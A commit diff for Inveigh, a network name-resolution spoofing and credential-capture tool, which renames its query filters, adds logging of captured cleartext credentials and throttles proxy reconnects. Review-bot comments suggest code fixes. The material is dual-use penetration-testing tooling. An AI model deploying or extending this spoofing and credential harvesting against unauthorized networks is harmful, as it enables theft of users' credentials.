cleartext, proxy fixes
Fixed cleartext capture/output bugs
Added proxyauth reconnect relay
Changed IgnoreHosts/ReplyToHosts to IgnoreQueries/ReplyToQueries
Kevin-Robertson committed Sep 28, 2022
1 parent 9931ad5 commit 5116878
Showing 11 changed files with 129 additions and 67 deletions.
4 changes: 2 additions & 2 deletions Inveigh/Listeners/DNSListener.cs
Expand Up @@ -39,8 +39,8 @@ public override bool Check(string name, string type, string clientIP, out string

DNSChecker helper = new DNSChecker
{
IgnoreHosts = Program.argIgnoreHosts,
ReplyToHosts = Program.argReplyToHosts,
IgnoreQueries = Program.argIgnoreQueries,
ReplyToQueries = Program.argReplyToQueries,
IgnoreIPs = Program.argIgnoreIPs,
ReplyToIPs = Program.argReplyToIPs,
IgnoreDomains = Program.argIgnoreDomains,
5 changes: 5 additions & 0 deletions Inveigh/Listeners/HTTPListener.cs
Expand Up @@ -38,6 +38,11 @@ protected override void OutputNTLM(string protocol, string listenerPort, string
Output.NTLMOutput(user, domain, ntlmChallenge, ntlmResponseHash, clientIP, host, protocol, listenerPort, clientPort, lmResponseHash);
}

protected override void OutputCleartext(string protocol, string listenerPort, string clientIP, string clientPort, string credentials)
{
Output.CleartextOutput(protocol, listenerPort, clientIP, clientPort, credentials);
}

protected override void OutputChallenge(string protocol, string listenerPort, string clientIP, string clientPort, string challenge)
{
Output.Queue(String.Format("[+] [{0}] {1}({2}) NTLM challenge [{3}] sent to {4}:{5}", Output.Timestamp(), protocol, listenerPort, challenge, clientIP, clientPort));
12 changes: 6 additions & 6 deletions Inveigh/Listeners/LLMNRListener.cs
Expand Up @@ -28,10 +28,10 @@ protected override void OutputError(Exception ex)
public override bool Check(string name, string type, string clientIP, out string message)
{

LLMNRChecker llmnrHelper = new LLMNRChecker
LLMNRChecker llmnrChecker = new LLMNRChecker
{
IgnoreHosts = Program.argIgnoreHosts,
ReplyToHosts = Program.argReplyToHosts,
IgnoreQueries = Program.argIgnoreQueries,
ReplyToQueries = Program.argReplyToQueries,
IgnoreIPs = Program.argIgnoreIPs,
ReplyToIPs = Program.argReplyToIPs,
IPCaptures = Program.IPCaptureList,
Expand All @@ -41,13 +41,13 @@ public override bool Check(string name, string type, string clientIP, out string
Inspect = Program.enabledInspect,
};

if (llmnrHelper.Check(name, type, clientIP))
if (llmnrChecker.Check(name, type, clientIP))
{
message = llmnrHelper.OutputMessage;
message = llmnrChecker.OutputMessage;
return true;
}

message = llmnrHelper.OutputMessage;
message = llmnrChecker.OutputMessage;
return false;
}

4 changes: 2 additions & 2 deletions Inveigh/Listeners/MDNSListener.cs
Expand Up @@ -33,8 +33,8 @@ public override bool Check(string name, string question, string type, string cli

MDNSChecker mdnsHelper = new MDNSChecker
{
IgnoreHosts = Program.argIgnoreHosts,
ReplyToHosts = Program.argReplyToHosts,
IgnoreQueries = Program.argIgnoreQueries,
ReplyToQueries = Program.argReplyToQueries,
IgnoreIPs = Program.argIgnoreIPs,
ReplyToIPs = Program.argReplyToIPs,
IPCaptures = Program.IPCaptureList,
4 changes: 2 additions & 2 deletions Inveigh/Listeners/NBNSListener.cs
Expand Up @@ -31,8 +31,8 @@ public override bool Check(string name, string type, string clientIP, out string

NetBIOSNSChecker helper = new NetBIOSNSChecker
{
IgnoreHosts = Program.argIgnoreHosts,
ReplyToHosts = Program.argReplyToHosts,
IgnoreQueries = Program.argIgnoreQueries,
ReplyToQueries = Program.argReplyToQueries,
IgnoreIPs = Program.argIgnoreIPs,
ReplyToIPs = Program.argReplyToIPs,
IPCaptures = Program.IPCaptureList,
28 changes: 14 additions & 14 deletions Inveigh/Program.cs
Expand Up @@ -74,10 +74,10 @@ class Program
public static string[] argIgnoreAgents = { "Firefox" };
public static string[] argIgnoreDomains;
public static string[] argIgnoreIPs;
public static string[] argIgnoreHosts;
public static string[] argIgnoreQueries;
public static string[] argIgnoreMACs;
public static string[] argReplyToDomains;
public static string[] argReplyToHosts;
public static string[] argReplyToQueries;
public static string[] argReplyToIPs;
public static string[] argReplyToMACs;
public static string argSpooferIP = "";
Expand Down Expand Up @@ -174,7 +174,7 @@ class Program
public static string netbiosDomain = Environment.UserDomainName;
public static string dnsDomain = "";
public static ulong smb2Session = 5548434740922023936; // todo check
public static string version = "2.0.6";
public static string version = "2.0.8";

static void Main(string[] arguments)
{
Expand Down Expand Up @@ -355,11 +355,6 @@ static void Main(string[] arguments)
argIgnoreDomains = arguments[entry.index + 1].ToUpper().Split(',');
break;

case "-IGNOREHOSTS":
case "/IGNOREHOSTS":
argIgnoreHosts = arguments[entry.index + 1].ToUpper().Split(',');
break;

case "-IGNOREIPS":
case "/IGNOREIPS":
argIgnoreIPs = arguments[entry.index + 1].ToUpper().Split(',');
Expand All @@ -370,6 +365,11 @@ static void Main(string[] arguments)
argIgnoreMACs = arguments[entry.index + 1].ToUpper().Replace(":", "").Replace("-", "").Split(',');
break;

case "-IGNOREQUERIES":
case "/IGNOREQUERIES":
argIgnoreQueries = arguments[entry.index + 1].ToUpper().Split(',');
break;

case "-INSPECT":
case "/INSPECT":
argInspect = arguments[entry.index + 1].ToUpper();
Expand Down Expand Up @@ -545,11 +545,6 @@ static void Main(string[] arguments)
argReplyToDomains = arguments[entry.index + 1].ToUpper().Split(',');
break;

case "-REPLYTOHOSTS":
case "/REPLYTOHOSTS":
argReplyToHosts = arguments[entry.index + 1].ToUpper().Split(',');
break;

case "-REPLYTOIPS":
case "/REPLYTOIPS":
argReplyToIPs = arguments[entry.index + 1].ToUpper().Split(',');
Expand All @@ -558,7 +553,12 @@ static void Main(string[] arguments)
case "-REPLYTOMACS":
case "/REPLYTOMACS":
argReplyToMACs = arguments[entry.index + 1].ToUpper().Replace(":", "").Replace("-", "").Split(',');
break;
break;

case "-REPLYTOQUERIES":
case "/REPLYTOQUERIES":
argReplyToQueries = arguments[entry.index + 1].ToUpper().Split(',');
break;

case "-WEBDAV":
case "/WEBDAV":
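Review bot: The `-IGNOREHOSTS`/`/IGNOREHOSTS` and `-REPLYTOHOSTS`/`/REPLYTOHOSTS` cases are deleted outright, so a command line written for the previous version no longer sets a filter; how the switch's default branch reacts is outside these hunks, but if the old flag is simply skipped, the run is no longer limited to the names the operator listed. Keeping the old spellings as extra labels on the new cases preserves that restriction, e.g. `case "-IGNOREHOSTS":` and `case "/IGNOREHOSTS":` stacked above `case "-IGNOREQUERIES":`, and likewise for ReplyTo. The new cases also read `arguments[entry.index + 1]` with no visible length check, as the neighbouring cases do, so a flag given last with no value may index past the array unless that is guarded elsewhere. `Main` begins and ends outside the hunks shown.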
22 changes: 20 additions & 2 deletions Inveigh/Protocols/Quiddity/Quiddity/Listeners/HTTPListener.cs
Expand Up @@ -41,6 +41,7 @@
using System.Net.Security;
using Quiddity.Support;
using System.Collections;
using System.Collections.Generic;

namespace Quiddity
{
Expand All @@ -64,6 +65,7 @@ class HTTPListener
public static bool isRunning = false;
public const SslProtocols tls12 = (SslProtocols)0x00000C00;
public static Hashtable httpSessionTable = Hashtable.Synchronized(new Hashtable());
public static Hashtable tcpSessionTable = Hashtable.Synchronized(new Hashtable());

public HTTPListener()
{
Expand Down Expand Up @@ -118,8 +120,18 @@ internal void Start(IPAddress ipAddress, int port, string type)
if (isRunning)
{
TcpClient tcpClient = tcpListener.EndAcceptTcpClient(tcpAsync);
object[] parameters = { tcpClient, type, port };
ThreadPool.QueueUserWorkItem(new WaitCallback(ReceiveClient), parameters);
string sourceIP = ((IPEndPoint)(tcpClient.Client.RemoteEndPoint)).Address.ToString();

if (type.Equals("Proxy") && tcpSessionTable.ContainsKey(sourceIP) && DateTime.Compare((DateTime)tcpSessionTable[sourceIP], DateTime.Now) > 0)
{
tcpClient.Client.Close();
}
else
{
object[] parameters = { tcpClient, type, port };
ThreadPool.QueueUserWorkItem(new WaitCallback(ReceiveClient), parameters);
}

}

}
Expand Down Expand Up @@ -490,6 +502,12 @@ internal void ReceiveClient(object parameters)
if (type.Equals("Proxy"))
{
tcpClient.Client.Close();

if (!tcpSessionTable.ContainsKey(sourceIP) || DateTime.Compare((DateTime)tcpSessionTable[sourceIP], DateTime.Now) <= 0)
{
tcpSessionTable[sourceIP] = DateTime.Now.AddSeconds(1);
}

}
else
{
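Review bot: The reconnect throttle added in `Start` and `ReceiveClient` builds and compares its expiry stamps with `DateTime.Now`, which is local wall-clock time; a daylight-saving step back or a time-zone change can leave an entry in `tcpSessionTable` in the future for far longer than the intended one second, and every Proxy connection from that address is closed until it passes. Using UTC at all three sites avoids the local-time case: `DateTime.Compare((DateTime)tcpSessionTable[sourceIP], DateTime.UtcNow)` in both comparisons and `tcpSessionTable[sourceIP] = DateTime.UtcNow.AddSeconds(1);` for the write. Nothing visible here removes entries, so the table appears to keep one row per client address for the life of the process; a comment on the field such as `// source IP -> time until which new Proxy connections from it are closed` would document what it holds and make that growth obvious. Both methods begin and end outside the hunks shown.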
20 changes: 10 additions & 10 deletions Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSChecker.cs
Expand Up @@ -37,8 +37,8 @@ namespace Quiddity.DNS
{
class DNSChecker
{
public string[] IgnoreHosts { get; set; }
public string[] ReplyToHosts { get; set; }
public string[] IgnoreQueries { get; set; }
public string[] ReplyToQueries { get; set; }
public string[] IgnoreIPs { get; set; }
public string[] ReplyToIPs { get; set; }
public string[] IgnoreDomains { get; set; }
Expand Down Expand Up @@ -103,12 +103,12 @@ public bool Check(string name, string type, string clientIP)
this.OutputMessage = this.OutputServiceDenied;
return false;
}
else if (HostIsDenied(name) || FQDNIsDenied(name))
else if (QueryIsDenied(name) || FQDNIsDenied(name))
{
this.OutputMessage = this.OutputHostDenied;
return false;
}
else if (!HostIsAllowed(name) && !FQDNIsAllowed(name))
else if (!QueryIsAllowed(name) && !FQDNIsAllowed(name))
{
this.OutputMessage = this.OutputHostDenied;
return false;
Expand Down Expand Up @@ -193,23 +193,23 @@ public bool ServiceIsAllowed(string name, string type)
return true;
}

public bool HostIsDenied(string name)
public bool QueryIsDenied(string name)
{
string host = (name.Split('.'))[0];

if (!Utilities.ArrayIsNullOrEmpty(this.IgnoreHosts) && Array.Exists(this.IgnoreHosts, element => element == host.ToUpper()))
if (!Utilities.ArrayIsNullOrEmpty(this.IgnoreQueries) && Array.Exists(this.IgnoreQueries, element => element == host.ToUpper()))
{
return true;
}

return false;
}

public bool HostIsAllowed(string name)
public bool QueryIsAllowed(string name)
{
string host = (name.Split('.'))[0];

if (!Utilities.ArrayIsNullOrEmpty(this.ReplyToHosts) && !Array.Exists(this.ReplyToHosts, element => element == host.ToUpper()))
if (!Utilities.ArrayIsNullOrEmpty(this.ReplyToQueries) && !Array.Exists(this.ReplyToQueries, element => element == host.ToUpper()))
{
return false;
}
Expand All @@ -220,7 +220,7 @@ public bool HostIsAllowed(string name)
public bool FQDNIsDenied(string name)
{

if (!Utilities.ArrayIsNullOrEmpty(this.IgnoreHosts) && Array.Exists(this.IgnoreHosts, element => element == name.ToUpper()))
if (!Utilities.ArrayIsNullOrEmpty(this.IgnoreQueries) && Array.Exists(this.IgnoreQueries, element => element == name.ToUpper()))
{
return true;
}
Expand All @@ -231,7 +231,7 @@ public bool FQDNIsDenied(string name)
public bool FQDNIsAllowed(string name)
{

if (!Utilities.ArrayIsNullOrEmpty(this.ReplyToHosts) && !Array.Exists(this.ReplyToHosts, element => element == name.ToUpper()))
if (!Utilities.ArrayIsNullOrEmpty(this.ReplyToQueries) && !Array.Exists(this.ReplyToQueries, element => element == name.ToUpper()))
{
return false;
}
65 changes: 51 additions & 14 deletions Inveigh/Support/Output.cs
Expand Up @@ -592,12 +592,12 @@ public static void NTLMOutput(string user, string domain, string challenge, stri

lock (Program.IPCaptureList)
{
Program.IPCaptureList.Add(string.Concat(host));
Program.IPCaptureList.Add(sourceIP);
}

lock (Program.HostCaptureList)
{
Program.HostCaptureList.Add(string.Concat(host));
Program.HostCaptureList.Add(host);
}

}
Expand Down Expand Up @@ -642,12 +642,12 @@ public static void NTLMOutput(string user, string domain, string challenge, stri

lock (Program.IPCaptureList)
{
Program.IPCaptureList.Add(string.Concat(host));
Program.IPCaptureList.Add(sourceIP);
}

lock (Program.HostCaptureList)
{
Program.HostCaptureList.Add(string.Concat(host));
Program.HostCaptureList.Add(host);
}

}
Expand Down Expand Up @@ -680,6 +680,43 @@ public static void NTLMOutput(string user, string domain, string challenge, stri

}

public static void CleartextOutput(string protocol, string listenerPort, string clientIP, string clientPort, string credentials)
{

bool isUnique = false;

if (Program.cleartextList.Any(str => str.Contains(credentials)))
{
isUnique = true;
}

lock (Program.cleartextList)
{
Program.cleartextList.Add(string.Concat(clientIP, ",", credentials));
}

if (Program.enabledConsoleUnique && isUnique)
{
Queue(string.Format("[+] [{0}] {1}({2}) cleartext credentials captured from {3}({4}):\r\n[not unique]", Timestamp(), protocol, listenerPort, clientIP, clientPort));
}
else
{
Queue(string.Format("[+] [{0}] {1}({2}) cleartext credentials captured from {3}({4}):\r\n{5}", Timestamp(), protocol, listenerPort, clientIP, clientPort, credentials));
}

if (Program.enabledFileOutput && (!Program.enabledFileUnique || !isUnique))
{

lock (Program.cleartextFileList)
{
Program.cleartextFileList.Add(string.Concat(clientIP, ",", credentials));
}

Queue(string.Format("[+] [{0}] {1}({2}) cleartext credentials written to {3}", Timestamp(), protocol, listenerPort, String.Concat(Program.argFilePrefix, "-Cleartext.txt")));
}

}

public static void FileOutput()
{

Expand Down Expand Up @@ -1005,10 +1042,10 @@ public static void GetHelp(string arg)
OutputHelp(argument, description);
}

if (nullarg || string.Equals(arg, "IGNOREHOSTS"))
if (nullarg || string.Equals(arg, "IGNOREQUERIES"))
{
string argument = "IgnoreHosts";
string description = "Default=None: Comma separated list of hostnames to ignore when spoofing.";
string argument = "IgnoreQueries";
string description = "Default=None: Comma separated list of name queries to ignore when spoofing.";
OutputHelp(argument, description);
}

Expand Down Expand Up @@ -1117,13 +1154,6 @@ public static void GetHelp(string arg)
OutputHelp(argument, description);
}

if (nullarg || string.Equals(arg, "REPLYTOHOSTS"))
{
string argument = "ReplyToHosts";
string description = "Default=All: Comma separated list of hostnames to respond to when spoofing.";
OutputHelp(argument, description);
}

if (nullarg || string.Equals(arg, "REPLYTOIPS"))
{
string argument = "ReplyToIPs";
Expand All @@ -1138,6 +1168,13 @@ public static void GetHelp(string arg)
OutputHelp(argument, description);
}

if (nullarg || string.Equals(arg, "REPLYTOQUERIES"))
{
string argument = "ReplyToqueries";
string description = "Default=All: Comma separated list of name queries to respond to when spoofing.";
OutputHelp(argument, description);
}

if (nullarg || string.Equals(arg, "SPOOFERIP"))
{
string argument = "SpooferIP";
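Review bot: In the new `CleartextOutput`, `Program.cleartextList.Any(...)` runs before `lock (Program.cleartextList)` is taken, so another listener thread can add to the list while it is being enumerated and the check-then-add is not atomic; if `cleartextList` is an ordinary list (its declaration is not on this page) that can throw or let the same value be reported as new twice. The flag is also named backwards: `isUnique` is set to true when a match already exists, which is the case the console prints as `[not unique]`. Doing the lookup and the `Add` under one lock and renaming the flag to `isDuplicate`, as sketched below, fixes both without changing the output. `str.Contains(credentials)` is a substring test over `clientIP,credentials` entries, so a value that is a prefix of an earlier capture counts as already seen; an equality test on the credentials part would be stricter. The help entry added further down spells the argument `ReplyToqueries`, where `ReplyToQueries` matches the property and the flag.

```csharp
public static void CleartextOutput(string protocol, string listenerPort, string clientIP, string clientPort, string credentials)
{
    bool isDuplicate;

    // Look up and add under one lock so a concurrent Add cannot run mid-enumeration.
    lock (Program.cleartextList)
    {
        isDuplicate = Program.cleartextList.Any(str => str.Contains(credentials));
        Program.cleartextList.Add(string.Concat(clientIP, ",", credentials));
    }

    // … unchanged: console and file output, with isUnique replaced by isDuplicate …
```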